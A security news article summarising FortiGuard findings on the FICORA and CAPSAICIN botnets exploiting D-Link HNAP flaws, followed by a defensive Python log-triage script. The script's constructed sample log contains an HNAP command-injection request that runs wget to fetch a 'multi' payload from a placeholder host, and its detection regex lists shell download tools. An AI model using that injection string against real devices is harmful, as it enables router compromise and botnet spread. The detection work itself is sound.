CVE-2024-33112 and More: How FICORA and CAPSAICIN Botnets Are Exploiting D-Link Devices
FortiGuard Labs has observed a notable spike in activity from two notorious botnets, FICORA and CAPSAICIN, during October and November of 2024. These botnets exploit long-standing vulnerabilities in D-Link devices to launch widespread attacks.
The vulnerabilities targeted by these botnets, some dating back nearly a decade, include CVE-2015-2051, CVE-2019-10891, CVE-2022-37056, and the more recent CVE-2024-33112. These flaws, found in the HNAP (Home Network Administration Protocol) interface, allow attackers to remotely execute malicious commands. Despite being well-documented, these weaknesses continue to pose significant risks due to the proliferation of unpatched devices.
FortiGuard Labs highlighted the ongoing relevance of such vulnerabilities, stating, “Attackers frequently reuse older attacks, which accounts for the continued spread of the ‘FICORA’ and ‘CAPSAICIN’ botnets.”
The FICORA botnet, a variant of the infamous Mirai malware, employs a shell script named “multi” to download and execute its payload. This downloader script adapts to various Linux architectures, targeting systems ranging from ARM to SPARC. The malware is equipped with DDoS capabilities, leveraging protocols like UDP, TCP, and DNS to disrupt networks.
A unique feature of FICORA is its use of the ChaCha20 encryption algorithm to encode its configuration, including its command-and-control (C2) server details. The report noted that “The scanner in FICORA includes a hard-coded username and password for its brute-force attack function,” indicating its aggressive propagation methods.
In contrast to FICORA’s global reach, the CAPSAICIN botnet exhibited a short burst of activity, primarily targeting East Asian countries on October 21 and 22, 2024. Delivered via a downloader script named “bins.sh,” CAPSAICIN focuses on dominating its victim hosts by killing known botnet processes.
This botnet, believed to be based on versions of malware developed by the Keksec group, incorporates a wide array of attack functions, including DDoS commands and environment variable manipulations. FortiGuard Labs’ analysis revealed its sophistication: “CAPSAICIN establishes a connection socket with its C2 server, ‘192[.]110[.]247[.]46,’ and sends the victim host’s OS information and the nickname given by the malware back to the C2 server.”
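As an added example, not code from the FortiGuard report or this article, the following Python routine triages web-server log lines for the indicators named above: command-injection tells on the HNAP interface, the downloader script names “multi” and “bins.sh”, and the CAPSAICIN C2 address. It assumes a combined-log style line where the logger records the request target, that HNAP requests land on a path beginning /HNAP1, and uses 198.51.100.20 as a placeholder download host in the constructed sample log.

```python
import re
from urllib.parse import unquote

# Indicators taken from the report summary: the HNAP interface, the downloader
# script names "multi" (FICORA) and "bins.sh" (CAPSAICIN), and the CAPSAICIN
# C2 address (refanged from 192[.]110[.]247[.]46).
HNAP_PATH = re.compile(r"/HNAP1?(/|\?|\s|$)", re.IGNORECASE)  # endpoint form is an assumption
DOWNLOADER_NAME = re.compile(r"/(multi|bins\.sh)(\?|\s|$)")
C2_HOSTS = ("192.110.247.46",)
# Generic shell-injection tells; only counted when seen on the HNAP path.
SHELL_TELLS = re.compile(r"(;|\||`|\$\(|/bin/sh|\bwget\b|\bcurl\b|\btftp\b)", re.IGNORECASE)
# Combined-log style line: client, timestamp, quoted request line, status code.
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})')

def triage_line(line):
    """Return {src, request, reasons} for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    req = unquote(m.group("req"))  # decode %XX so ';' and 'wget' become visible
    reasons = []
    if HNAP_PATH.search(req):
        if SHELL_TELLS.search(req):
            reasons.append("hnap_command_injection_pattern")
        if DOWNLOADER_NAME.search(req):
            reasons.append("known_downloader_script_name")
    if any(host in req for host in C2_HOSTS):
        reasons.append("known_c2_address")
    return {"src": m.group("src"), "request": req, "reasons": reasons}

def triage(lines):
    """Keep only the lines that tripped at least one indicator."""
    return [r for r in map(triage_line, lines) if r and r["reasons"]]

# Constructed sample log (not from the report); 198.51.100.20 is a placeholder host.
SAMPLE_LOG = [
    '10.0.0.5 - - [21/Oct/2024:10:00:01 +0000] "GET /HNAP1/ HTTP/1.1" 200 512',
    '10.0.0.8 - - [21/Oct/2024:10:00:02 +0000] "GET /index.html HTTP/1.1" 200 1024',
    '203.0.113.9 - - [21/Oct/2024:10:00:03 +0000] "GET /HNAP1/?x=%3Bwget%20http%3A%2F%2F198.51.100.20%2Fmulti HTTP/1.1" 200 0',
    '10.0.0.5 - - [21/Oct/2024:10:00:04 +0000] "GET http://192.110.247.46/ HTTP/1.1" 502 0',
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG):
        print(hit["src"], hit["reasons"], hit["request"])
```

A legitimate HNAP request with no shell tells (the first sample line) is deliberately not reported, so the routine flags abuse of the interface rather than its ordinary use.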